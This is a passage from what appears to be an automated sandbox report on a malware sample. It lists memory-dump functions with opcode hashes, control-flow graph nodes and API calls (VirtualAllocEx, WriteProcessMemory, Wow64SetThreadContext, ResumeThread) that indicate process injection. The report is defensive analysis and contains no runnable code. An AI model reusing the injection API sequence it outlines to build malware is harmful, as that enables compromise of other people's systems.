                            • Instruction ID: 0452ec4e72bd55c315ab8b3d68f398fc1af0c4b699339ba70721d18082fe89b0
                            • Opcode Fuzzy Hash: f369c7dbafcccf9db59d6c6c6b96d46f0501499da46da86996534d04987b7a5f
                            • Instruction Fuzzy Hash: 9391C5B4E042498FDB08CFAAC884ADEFBB2FF89310F24946AD415BB265D7345946CF54
                            Function 0240EC5E Relevance: .2, Instructions: 207COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515413176.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2400000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 193a021ba68f222168eda71c596c93c75958c6d5105d4c66fde838631b57a47c
                            • Instruction ID: d920b7802407c7ad07ae49f092a9619a0d371aa415cf8dc646646c894f01fa93
                            • Opcode Fuzzy Hash: 193a021ba68f222168eda71c596c93c75958c6d5105d4c66fde838631b57a47c
                            • Instruction Fuzzy Hash: 0491D2B4E042098FDB08CFAAC884ADEFBB2FF88310F24942AD415BB264D7355946CF54
                            Function 0240EC24 Relevance: .2, Instructions: 207COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515413176.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2400000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fe357c416c6d252e80f2f5d06a6eef221408a64a9f67b0b29f881afdde74c115
                            • Instruction ID: e525a841dafed59df95f103b0e8862dfc5d2e91ede06b41274ab5da3914223bc
                            • Opcode Fuzzy Hash: fe357c416c6d252e80f2f5d06a6eef221408a64a9f67b0b29f881afdde74c115
                            • Instruction Fuzzy Hash: 6F91D4B4E042098FDB08CFAAC8846DEFBB2FF89310F24952AD415BB264D7345956CF54
                            Function 0240EC98 Relevance: .2, Instructions: 207COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515413176.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2400000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 481bdfc4f06caaf01c7c61aa11b6141e5f810fb1bb4f9b61a4cde86fa46c6c11
                            • Instruction ID: 29c7d5ef634396ce80800d025de01b2a9d53b54f19731c760e59255f63f06616
                            • Opcode Fuzzy Hash: 481bdfc4f06caaf01c7c61aa11b6141e5f810fb1bb4f9b61a4cde86fa46c6c11
                            • Instruction Fuzzy Hash: 2791B3B4E142099FDB08CFAAC584ADEFBB2FF88310F24952AD415BB264D7349946CF54
                            Function 023F6D00 Relevance: .2, Instructions: 159COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515357431.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_23f0000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8f24135e17539035d6df446e5cfca9c5b821442a95aa53a1f50cfca55dfa5db6
                            • Instruction ID: 9b4e9df6ce6bb9e0c01f8de8eea38deedfa3d797853d29e76c7a85cf3b4f2898
                            • Opcode Fuzzy Hash: 8f24135e17539035d6df446e5cfca9c5b821442a95aa53a1f50cfca55dfa5db6
                            • Instruction Fuzzy Hash: 4A618D70D00219DFCB48CFE5E956AAEBBB9FF48301F14852AD526BB660D7788A01CF50
                            Function 023F6CF0 Relevance: .2, Instructions: 156COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515357431.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_23f0000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7e12c8863386037c9284e298ec77e6d5384c58c408ec30869b5630629fe6a074
                            • Instruction ID: 748f03912c74d69c71545cd9955e1f8d00ff81ee47420dee8631e3f7d95f8adb
                            • Opcode Fuzzy Hash: 7e12c8863386037c9284e298ec77e6d5384c58c408ec30869b5630629fe6a074
                            • Instruction Fuzzy Hash: 4C61A970D04219DFCB48CFA5E9566AEBBB9FF49301F14852AD026AB660D7788A01CF50
                            Function 05E7E810 Relevance: .1, Instructions: 119COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3517289518.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5e70000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a1daaf5b3479f8adb69a76eae953771d5ec42c5fc17ff979f8005a000668ba46
                            • Instruction ID: 439a4b371096718bccb1a4f25e57c618c7b2d1ca951784ea3ebc94e660785729
                            • Opcode Fuzzy Hash: a1daaf5b3479f8adb69a76eae953771d5ec42c5fc17ff979f8005a000668ba46
                            • Instruction Fuzzy Hash: E6510670D01218DFDB28CFA6C884ADEBBF6BF89310F1485A9D409AB254DB356A85CF50
                            Function 023FB238 Relevance: .1, Instructions: 97COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515357431.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_23f0000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b0a201d6a6c0acce23aeeaa382986c8ab4a223f43b3b665cd1907a6c28b10958
                            • Instruction ID: 8ba4eb2ac8e3a623c829fdb8e2bf658552dee35d9c18f7d9a2fbbdf157bd111b
                            • Opcode Fuzzy Hash: b0a201d6a6c0acce23aeeaa382986c8ab4a223f43b3b665cd1907a6c28b10958
                            • Instruction Fuzzy Hash: 1141C3B4E002188BDB58CFAAD9446DEFBF7BF88310F14C16AD548A7214EB345A85CF54
                            Function 0240E088 Relevance: .1, Instructions: 84COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515413176.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2400000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f936b680f97e27cf5fcd49f506f86b70b455890b2e38a6675848da237868a446
                            • Instruction ID: 12c146320464f0a9e84e736e8b92d535a30b256c13cb1f3601190f8634428ddd
                            • Opcode Fuzzy Hash: f936b680f97e27cf5fcd49f506f86b70b455890b2e38a6675848da237868a446
                            • Instruction Fuzzy Hash: B131DA71E006188BEB58DF6ADD4079EBBF7BFC8200F14C5AAD40CA7264DB3059858F61
                            Function 023F1AF8 Relevance: .1, Instructions: 65COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515357431.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_23f0000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 18b414b2712138c9428b78f34794a3f02dde11481a8a9befddcc558e93c371ae
                            • Instruction ID: a9337a0abc8a1576c8270644d09a122eef016c22a18f815d3e1b3458b4794df1
                            • Opcode Fuzzy Hash: 18b414b2712138c9428b78f34794a3f02dde11481a8a9befddcc558e93c371ae
                            • Instruction Fuzzy Hash: 7321E971E016188BEB58CF6BDC5069EFBF7AFC8200F04C5BAC90CA6264EB341A558F51
                            Function 02120EA8 Relevance: 2.7, Strings: 2, Instructions: 229COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 3457 2120ea8-2120ed5 3459 21212c4 3457->3459 3460 2120edb-2120ede 3457->3460 3462 21212c9-21212e8 3459->3462 3460->3459 3461 2120ee4-2120f7d 3460->3461 3461->3462 3476 2120f83-2120fa5 call 21217c9 3461->3476 3476->3462 3480 2120fab-2120fb8 3476->3480 3533 2120fba call 2126f11 3480->3533 3534 2120fba call 2126d31 3480->3534 3535 2120fba call 2126ef6 3480->3535 3536 2120fba call 2126e17 3480->3536 3537 2120fba call 2126f95 3480->3537 3538 2120fba call 212707b 3480->3538 3539 2120fba call 2126ebe 3480->3539 3540 2120fba call 2126fdf 3480->3540 3541 2120fba call 2126dc3 3480->3541 3542 2120fba call 2126c80 3480->3542 3543 2120fba call 2126d6a 3480->3543 3544 2120fba call 2126e6b 3480->3544 3545 2120fba call 21270ee 3480->3545 3482 2120fc0-2120fe2 3482->3462 3485 2120fe8-2121025 3482->3485 3490 2121027-212102d 3485->3490 3491 212102f-2121043 3485->3491 3492 2121069-21210b8 3490->3492 3494 2121045 3491->3494 3495 212104c-2121067 3491->3495 3504 21210be-21210d6 3492->3504 3505 212119d 3492->3505 3494->3495 3495->3492 3512 2121177-2121182 3504->3512 3506 21211a2-21211b1 3505->3506 3509 21211b3 3506->3509 3510 21211bc-21211bd 3506->3510 3509->3510 3510->3459 3515 21210db-2121116 3512->3515 3516 2121188-212119b 3512->3516 3521 2121118-2121142 call 2122143 3515->3521 3522 212115f-2121164 3515->3522 3516->3506 3527 2121148-212115d 3521->3527 3526 212116c-2121172 3522->3526 3526->3512 3527->3516 3533->3482 3534->3482 3535->3482 3536->3482 3537->3482 3538->3482 3539->3482 3540->3482 3541->3482 3542->3482 3543->3482 3544->3482 3545->3482
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.3514167939.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2120000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID: ^u]$#k
                            • API String ID: 0-550269657
                            • Opcode ID: 03d8d8d09e344dd6c2aee5a33ee69413dc7dea1f823696abf23d17a7bd8efdcc
                            • Instruction ID: 6d5d17d6bcc3e6783b43100eb8aa5657a67fbac55aa0063e10d53db345e08336
                            • Opcode Fuzzy Hash: 03d8d8d09e344dd6c2aee5a33ee69413dc7dea1f823696abf23d17a7bd8efdcc
                            • Instruction Fuzzy Hash: 9D81B230B40314DFDB18EBB9D85876E7BA6BFC4700F208568E40A9B395CF349C559B91
                            Function 02128310 Relevance: 2.0, Strings: 1, Instructions: 779COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 3784 2128310-21287fe 3859 2128d50-2128daf 3784->3859 3860 2128804-2128814 3784->3860 3877 2128db1-2128dbb 3859->3877 3878 2128e26-2128e32 3859->3878 3860->3859 3861 212881a-212882a 3860->3861 3861->3859 3863 2128830-2128840 3861->3863 3863->3859 3865 2128846-2128856 3863->3865 3865->3859 3867 212885c-212886c 3865->3867 3867->3859 3868 2128872-2128882 3867->3868 3868->3859 3869 2128888-2128898 3868->3869 3869->3859 3871 212889e-21288ae 3869->3871 3871->3859 3873 21288b4-21288c4 3871->3873 3873->3859 3874 21288ca-21288da 3873->3874 3874->3859 3876 21288e0-2128d4f 3874->3876 3877->3878 3882 2128dbd-2128dc9 3877->3882 3884 2128e34-2128e40 3878->3884 3885 2128e49 3878->3885 3891 2128dcb-2128dd6 3882->3891 3892 2128dee-2128df1 3882->3892 3884->3885 3893 2128e42-2128e47 3884->3893 3886 2128e4c-2128e52 3885->3886 3896 2128e53-2128e55 3886->3896 3897 2128e8f-2128e91 3886->3897 3891->3892 3910 2128dd8-2128de2 3891->3910 3894 2128df3-2128dff 3892->3894 3895 2128e08-2128e14 3892->3895 3899 2128e76-2128e7b 3893->3899 3894->3895 3913 2128e01-2128e06 3894->3913 3902 2128e16-2128e1d 3895->3902 3903 2128e7c-2128e8e 3895->3903 3900 2128e57-2128e63 3896->3900 3901 2128e6c-2128e6e 3896->3901 3905 2128e92-2128e94 3897->3905 3906 2128eab-2128eb7 3897->3906 3900->3901 3919 2128e65-2128e6a 3900->3919 3901->3899 3902->3903 3909 2128e1f-2128e24 3902->3909 3903->3897 3905->3886 3907 2128e96-2128ea9 3905->3907 3917 2128ec6-2128eca 3906->3917 3918 2128eb9-2128ec4 3906->3918 3907->3906 3909->3899 3910->3892 3923 2128de4-2128de9 3910->3923 3913->3899 3921 2128edc 3917->3921 3922 2128ecc-2128eda 3917->3922 3918->3917 3919->3899 3926 2128ede-2128ee0 3921->3926 3922->3926 3923->3899 3927 2128ee2-2128ee4 3926->3927 3928 2128ee6-2128eee 3926->3928 3927->3928 3930 2128ef0-2128f02 3928->3930 3931 2128f11-2128f13 3928->3931 3930->3931 3937 2128f04-2128f0f 3930->3937 3932 2128f41-2128f45 3931->3932 3933 2128f15-2128f22 call 2127b10 3931->3933 3939 2128f4d-2128f52 3932->3939 3933->3932 3940 2128f24-2128f33 3933->3940 3937->3931 3940->3932 3945 2128f35-2128f3f 3940->3945 3945->3932
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.3514167939.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2120000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID: q=7
                            • API String ID: 0-2180706807
                            • Opcode ID: 5e54f43da6673a9ef0de137ebc403531b40a6e88c9b1f132053cacfa57cd28ab
                            • Instruction ID: 122c215e5142584b57f9eb299715fcc53d8181cf527b5cb166bca0373e8ae56b
                            • Opcode Fuzzy Hash: 5e54f43da6673a9ef0de137ebc403531b40a6e88c9b1f132053cacfa57cd28ab
                            • Instruction Fuzzy Hash: 1C622274A103188FEB14DBA4C850BAEBB73EF88301F2081AAD50A6B3A5DF355D55DF61
                            Function 0240DF06 Relevance: 1.6, APIs: 1, Instructions: 139memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 4022 240df06-240df0d 4023 240df0e-240df34 4022->4023 4023->4023 4024 240df36-240e048 VirtualProtect 4023->4024 4027 240e051-240e072 4024->4027 4028 240e04a-240e050 4024->4028 4028->4027
                            APIs
                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0240E03B
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515413176.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2400000_file.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: 12a1ffc06f470ba0a20c17062bf938e155a3196878a7876bea6042544d167d6e
                            • Instruction ID: b1267b3998a57de7e655a73b07246bfc6064c046a36ad7f58b03fdd24e2c3ce1
                            • Opcode Fuzzy Hash: 12a1ffc06f470ba0a20c17062bf938e155a3196878a7876bea6042544d167d6e
                            • Instruction Fuzzy Hash: 3851AF71844285CFD7058F95C49AADAFFF0EF0A320F1AC099C499DB212C778869BCB50
                            Function 023FE918 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 4030 23fe918-23fe966 4032 23fe968-23fe974 4030->4032 4033 23fe976-23fe9b5 WriteProcessMemory 4030->4033 4032->4033 4035 23fe9be-23fe9ee 4033->4035 4036 23fe9b7-23fe9bd 4033->4036 4036->4035
                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 023FE9A8
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515357431.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_23f0000_file.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: c5d71836d62d8187cb3e7e9be2151f7476782dea30ad92a4883f9f61d5ba8a1b
                            • Instruction ID: 86bacbffbcfb29957d1faf493c237ba51c4e10513ab205ba377258e6c5083f77
                            • Opcode Fuzzy Hash: c5d71836d62d8187cb3e7e9be2151f7476782dea30ad92a4883f9f61d5ba8a1b
                            • Instruction Fuzzy Hash: 14214471900309DFDB10CFAAC880BDEBBF5FF48310F10842AE918A7250C7789940CBA4
                            Function 023FF280 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 4050 23ff280-23ff2cb 4052 23ff2cd-23ff2d9 4050->4052 4053 23ff2db-23ff30b Wow64SetThreadContext 4050->4053 4052->4053 4055 23ff30d-23ff313 4053->4055 4056 23ff314-23ff344 4053->4056 4055->4056
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 023FF2FE
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515357431.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_23f0000_file.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: ca1a1ecd049ca710b562049701d832ce24bdf658aa793f84d664e5b8a14bd85b
                            • Instruction ID: 9e4c171dbe6752b57d8129cdd3954ad3eb41f1ba5837375c2279b16bf1e91b26
                            • Opcode Fuzzy Hash: ca1a1ecd049ca710b562049701d832ce24bdf658aa793f84d664e5b8a14bd85b
                            • Instruction Fuzzy Hash: 3C214771D003099FDB10DFAAC8857EFBBF4EF48214F14842AD959A7240CB78A945CFA5
                            Function 023FDEF0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 4040 23fdef0-23fdf3b 4042 23fdf3d-23fdf49 4040->4042 4043 23fdf4b-23fdf7b Wow64GetThreadContext 4040->4043 4042->4043 4045 23fdf7d-23fdf83 4043->4045 4046 23fdf84-23fdfb4 4043->4046 4045->4046
                            APIs
                            • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 023FDF6E
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515357431.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_23f0000_file.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: e602605eb256e08b5c888eaa32fa09246f66bd66f195f848b63ed58acb1d4b2f
                            • Instruction ID: 5ae876bed7d13a44ecd0023c3a2650b7b20eeee6ad086a0b57642ff6a55883cc
                            • Opcode Fuzzy Hash: e602605eb256e08b5c888eaa32fa09246f66bd66f195f848b63ed58acb1d4b2f
                            • Instruction Fuzzy Hash: 772147719003098FDB10CFAAC885BEFBBF4EF89214F14842AD519A7240CB78A945CFA5
                            Function 023FEDB8 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                            Download Yara Rule
                            APIs
                            • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 023FEE2F
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515357431.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_23f0000_file.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: bbb3120e888ba57f83c4f77bd9ac566e1a1855fcd0b697c4eb5e1bd640ab390b
                            • Instruction ID: 553ab97f9143c02e816e7329325fca081df9d38e4192f050077b78b90932fe8f
                            • Opcode Fuzzy Hash: bbb3120e888ba57f83c4f77bd9ac566e1a1855fcd0b697c4eb5e1bd640ab390b
                            • Instruction Fuzzy Hash: 3F2147718003099FDB10CFAAC840BEFBBF4EF48320F14842AD519A7250D7799901CFA1
                            Function 023F4D18 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 023F4D93
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515357431.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_23f0000_file.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: c43fa103772dad284945b9f9b6d89b354c141201edbf4abf7fefc1bfa78fbaf4
                            • Instruction ID: bb12ea5929c06840d572fe726d5077a7e58f36212756f17b8a8b2510233a3a58
                            • Opcode Fuzzy Hash: c43fa103772dad284945b9f9b6d89b354c141201edbf4abf7fefc1bfa78fbaf4
                            • Instruction Fuzzy Hash: 1B2113B69002499FDB10CF9AC884BDEBBF4EB48310F14842AE958A7251D378A544CFA5
                            Function 0240DFC8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0240E03B
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515413176.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2400000_file.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: d38db59669ecd15c49c6b21f4a8584cb4348afd5ebbd68c1d1b26625b79da0df
                            • Instruction ID: 197884dba68006765bf9f96da5eb087f97d2291d6caa745a86c9d9ee6186c2b1
                            • Opcode Fuzzy Hash: d38db59669ecd15c49c6b21f4a8584cb4348afd5ebbd68c1d1b26625b79da0df
                            • Instruction Fuzzy Hash: 092117B19006499FDB10CF9AC484BDFFBF4FB48310F10842AE958A7250D374A544CFA5
                            Function 023F4D20 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 023F4D93
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515357431.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_23f0000_file.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: bd9abd9c3a7632bf6cd1691efe144c48c46e5d241748cc58d15140556cdf0af2
                            • Instruction ID: 4634b80fa51de0c70b0a07a095f63d6192a9cb4df100527454fd0f92d7022d40
                            • Opcode Fuzzy Hash: bd9abd9c3a7632bf6cd1691efe144c48c46e5d241748cc58d15140556cdf0af2
                            • Instruction Fuzzy Hash: D421E7769006499FDB10CF9AD484BDFFBF4FB48310F14842AE558A7251D374A544CFA5
                            Function 023FE5D8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 023FE646
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515357431.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_23f0000_file.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: acf9f896a09638e08b4aa3efb8fa1867526a059f4edd2faf6150510632c0dbcc
                            • Instruction ID: e7f79abcdf7044c35a28e2ac5228a85e02b58bd17017af7e25d1ffdb1fdfb99b
                            • Opcode Fuzzy Hash: acf9f896a09638e08b4aa3efb8fa1867526a059f4edd2faf6150510632c0dbcc
                            • Instruction Fuzzy Hash: 4F1123729003499FDB10DFAAD844BDFBBF5EB88320F14881AE519A7250C775A940CFA5
                            Function 023FF4E8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515357431.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_23f0000_file.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: 8672eeb80154ef735231e2993c4a3b8fe8bc48584a3254739c64ca66a9427171
                            • Instruction ID: 9c1412a32931f56352a06b34f0ac5957a2442f7e70fd34ee54f5210d2ef7b352
                            • Opcode Fuzzy Hash: 8672eeb80154ef735231e2993c4a3b8fe8bc48584a3254739c64ca66a9427171
                            • Instruction Fuzzy Hash: 18113A719003498FDB20DFAAD84579FFBF4EB88614F14841AD519A7240C775A944CFA5
                            Function 023F51B8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                            Download Yara Rule
                            APIs
                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 023FF9E5
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515357431.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_23f0000_file.jbxd
                            Similarity
                            • API ID: MessagePost
                            • String ID:
                            • API String ID: 410705778-0
                            • Opcode ID: 035430772fd337736e4a996ff1207a2a4cf34ba140e95cff821ed078cd61e394
                            • Instruction ID: 0102367823887587944d95d49095459f32b51e94d7d924fb6ffc24b274295cf2
                            • Opcode Fuzzy Hash: 035430772fd337736e4a996ff1207a2a4cf34ba140e95cff821ed078cd61e394
                            • Instruction Fuzzy Hash: A41122B5800349DFDB10CF8AD884BDFBBF8EB48310F10841AEA58A7640C375A940CFA5
                            Function 02126F95 Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.3514167939.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2120000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID: >
                            • API String ID: 0-325317158
                            • Opcode ID: 35e344236012c0d7f7009a3c11f4f6142e67adfe5b6998fa36c21a2cbebccba8
                            • Instruction ID: 23c91e3649440b8d4fede9631d81df7047c761c6a73628a58d136484b49dad1a
                            • Opcode Fuzzy Hash: 35e344236012c0d7f7009a3c11f4f6142e67adfe5b6998fa36c21a2cbebccba8
                            • Instruction Fuzzy Hash: 6661DF34A402559FCB058F74D4647AEBBF6AF8A310F1840A8E841DB3A2DB34DC4ACB50
                            Function 02126EBE Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.3514167939.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2120000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID: >
                            • API String ID: 0-325317158
                            • Opcode ID: c1d5acf895fe2b5b5fd3d34492412574a34cb930e5dd914519e7bdd0f8ba96b3
                            • Instruction ID: e04d0eb69aae82fb49de9c382da7f9256600cb6b59deb57bd6e2089ea6765457
                            • Opcode Fuzzy Hash: c1d5acf895fe2b5b5fd3d34492412574a34cb930e5dd914519e7bdd0f8ba96b3
                            • Instruction Fuzzy Hash: 0661C034A443559FDB059F74D454AAEBBF2BF8A310F2840A9E841DB3A2DB34DD46CB50
                            Function 02126D31 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.3514167939.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2120000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID: >
                            • API String ID: 0-325317158
                            • Opcode ID: 24f97a2fa4e43e212f8e394f058ffe7e191ae420d6c962f3c715248ae64693cb
                            • Instruction ID: 070e7fe8a799003485e5f6c84909fa793328813fc6e0bfc3754bb947a18b74e0
                            • Opcode Fuzzy Hash: 24f97a2fa4e43e212f8e394f058ffe7e191ae420d6c962f3c715248ae64693cb
                            • Instruction Fuzzy Hash: 8061C034A442559FCB058F74D4646AEBFF2AF8A310F1840A9E841DB3A2DB34DD46CB50
                            Function 02120E77 Relevance: 1.4, Strings: 1, Instructions: 174COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.3514167939.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2120000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID: ^u]
                            • API String ID: 0-3740367442
                            • Opcode ID: b3b114c93e1d2334432b18a87c49435b43503abd167bc89224786e09aa93d98b
                            • Instruction ID: 1357de1e4d142deb6e4a926494702106d6a343dfc9d43a089bf8a1264b21e96a
